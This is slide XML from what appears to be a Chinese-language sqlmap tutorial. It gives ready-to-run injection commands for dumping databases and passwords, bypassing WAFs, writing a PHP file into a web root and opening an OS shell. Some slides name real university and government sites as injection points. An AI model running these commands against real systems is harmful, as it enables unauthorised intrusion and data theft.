              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>access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dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mssql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dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mysql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dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>oracle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dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>postgresql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dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>db2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dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sqlite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等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57505" marR="0" lvl="0" indent="-357505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charset="0"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pP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可以进行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sql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盲注、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>union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查询、显错注入、延迟注入、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>post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注入、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a: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注入等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57505" marR="0" lvl="0" indent="-357505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charset="0"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pP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其他功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty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57505" marR="0" lvl="0" indent="-357505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charset="0"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>执行命令、列举用户、检测权限、自动破解、数据导出等功能。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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--batch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--batch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用此参数，不需要用户输入，将会使用sqlmap提示的默认值一直运行下去。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强制使用字符编码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>--charset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不使用sqlmap自动识别的（如HTTP头中的Content-Type）字符编码，强制指定字符编码如：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--charset=GBK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--flush-session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--flush-session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如果不想用之前缓存这个目标的session文件，可以使用这个参数。 会清空之前的session，重新测试该目标。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>自动获取form表单测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>--hex</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>有时候字符编码的问题，可能导致数据丢失，可以使用hex函数来避免：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>例子：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sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --banner --hex -v 3 --parse-errors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--output-dir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--output-dir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sqlmap默认把session文件跟结果文件保存在output文件夹下，用此参数可自定义输出路径 例如：--output-dir=/tmp</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>从响应中获取DBMS的错误信息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参数：--parse-errors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有时目标没有关闭DBMS的报错，当数据库语句错误时，会输出错误语句，用词参数可以会显出错误信息。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--smart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--mobile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/>
              <a:t>--smart</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>有时对目标非常多的URL进行测试，为节省时间，只对能够快速判断为注入的报错点进行注入，可以使用此参数。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>例子：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&amp;user=foo&amp;id=1" --batch --smart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--mobile</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>有时服务端只接收移动端的访问，此时可以设定一个手机的User-Agent来模仿手机登陆。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$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile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080" y="544830"/>
            <a:ext cx="7794625" cy="648335"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>--identify-waf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--check-waf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zh-CN" altLang="en-US"/>
              <a:t>--identify-waf</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>sqlmap可以尝试找出WAF/IPS/IDS保护，方便用户做出绕过方式。目前大约支持30种产品的识别。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--check-waf</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>WAF/IPS/IDS保护可能会对sqlmap造成很大的困扰，如果怀疑目标有此防护的话，可以使用此参数来测试。 sqlmap将会使用一个不存在的参数来注入测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>例如对一个受到ModSecurity WAF保护的MySQL例子：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3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注册表操作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20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前web应用支持堆查询。 当然，当前连接数据库的用户也需要有权限操作注册表。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>读取注册表值</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>参数：--reg-read</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>写入注册表值</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>参数：--reg-add</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>删除注册表值</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>参数：--reg-del</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注册表辅助选项</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>参数：--reg-key，--reg-value，--reg-data，--reg-type</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>需要配合之前三个参数使用，例子：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>type=REG_SZ --reg-data=1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暴力破解表名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--common-tables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当使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>--tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>无法获取到数据库的表时，可以使用此参数。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通常是如下情况：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数据库版本小于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，没有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>表。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、数据库是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Microssoft Access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，系统表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MSysObjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是不可读的（默认）。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、当前用户没有权限读取系统中保存数据结构的表的权限。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暴力破解的表在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>txt/common-tables.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件中，你可以自己添加。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Xx  --common-tables -D testdb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p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暴力破解列名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--common-columns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与暴力破解表名一样，暴力跑的列名在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>txt/common-columns.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中。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Xx  --common-columns  -T text -D testdb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  <a:p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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>登录框注入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注入点：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://testasp.vulnweb.com/Login.asp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几种注入方式：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>./sqlmap.py -r search-test.txt -p tfUPass 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en-US" altLang="zh-CN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 sqlmap -u http://testasp.vulnweb.com/Login.asp --forms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 sqlmap -u http://testasp.vulnweb.com/Login.asp --data "tfUName=1&amp;tfUPass=1"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p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搜索框注入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sqlmap.py -r search-test.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p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sqlmap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>
          <a:xfrm>
            <a:off x="929845" y="1646185"/>
            <a:ext cx="6222985" cy="4327325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="1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charset="0"/>
            </a:pP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下载地址：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http://www.sqlmap.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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charset="0"/>
            </a:pP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安装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charset="0"/>
            </a:pP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首先需要安装</a:t>
            </a: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python2.7 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环境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charset="0"/>
            </a:pP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charset="0"/>
            </a:pP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直接解压即可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charset="0"/>
            </a:pP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更新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sqlmap.py --update</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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charset="0"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="1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8290" y="2784475"/>
            <a:ext cx="3883025" cy="1843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伪静态注入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zh-CN" altLang="pl-PL" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入点：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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pl-PL" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sqlmap -u http://sfl.fzu.edu.cn/index.php/Index/view/id/40*.htm</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码注入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es-ES" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs</a:t>
            </a:r>
            <a:endParaRPr lang="es-E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http://lm.yichang.gov.cn/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请求时间延迟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--time-sec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当使用继续时间的盲注时，时刻使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>--time-sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>参数设定延时时间，默认是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--sql-query="select @@version"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--sql-shell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en-US" altLang="zh-CN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sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>会自动检测确定使用哪种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注入技术，如何插入检索语句。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如果是</a:t>
            </a:r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查询语句，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sqlap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>将会输出结果。如果是通过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注入执行其他语句，需要测试是否支持多语句执行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语句。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文件读写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从数据库服务器中读取文件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--file-read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当数据库为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PostgreSQL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Microsoft SQL Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，并且当前用户有权限使用特定的函数。读取的文件可以是文本也可以是二进制文件。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pl-PL" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sqlmap.py -u "http://192.168.2.3:81/about/show.php</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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pl-PL" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>?lang=cn&amp;id=22" --file-read="C:\Inetpub\wwwroot\mysql-php\1.php"</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" altLang="zh-CN" kern="1200" dirty="0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文件上传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--file-write,--file-dest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当数据库为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PostgreSQL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Microsoft SQL Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，并且当前用户有权限使用特定的函数。上传的文件可以是文本也可以是二进制文件。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pl-PL" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sqlmap.py -u "http://192.168.2.129/article.php?id=5" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>--file-write="C:\1.php" --file-dest="/var/www/html/x.php"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命令执行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--os-cmd,--os-shell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当数据库为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PostgreSQL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Microsoft SQL Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，并且当前用户有权限使用特定的函数。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PostgreSQL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sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上传一个二进制库，包含用户自定义的函数，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sys_exec()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sys_eval()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>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cmd			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>命令（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>win</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）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shell			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>执行当前用户命令 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--os-shell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自动上传 脚本文件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返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shell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WAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>绕过注入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注入点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:http://192.168.159.1/news.php?id=1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"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sqlmap -u http://192.168.159.1/news.php?id=1 -v 3 --dbs  --batch --tamper "space2morehash.py"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"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space2hash.py   base64encode.py charencode.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p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基本参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8194" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1017588" y="1939896"/>
            <a:ext cx="7143646" cy="3931066"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr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Sqlmap.py  -h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查看帮助选项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is-dba			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当前用户权限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dbs				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所有数据库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current-db			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网站当前数据库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users			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所有数据库用户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current-user		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当前数据库用户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tables			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参数</a:t>
            </a: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列表名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columns			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参数</a:t>
            </a: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列字段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dump			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参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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下载数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern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endParaRPr lang="en-US" altLang="zh-CN" kern="1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--dump 			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>获取表中的数据，包含列 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--dump-all			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>转存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DBMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库所有表项目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--level			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>测试等级</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(1-5)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，默认为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1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读取数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>---&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>读取表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>----&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>读取表的列</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>----&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>获取内容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-D  			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>指定数据库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-T			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>指定表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-C			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>指定列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--dbms=mysql  oracle mssql     	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>指定数据库</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="1200" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US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--users	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>枚举所有用户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--passwords	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>枚举所有用户密码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--roles	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
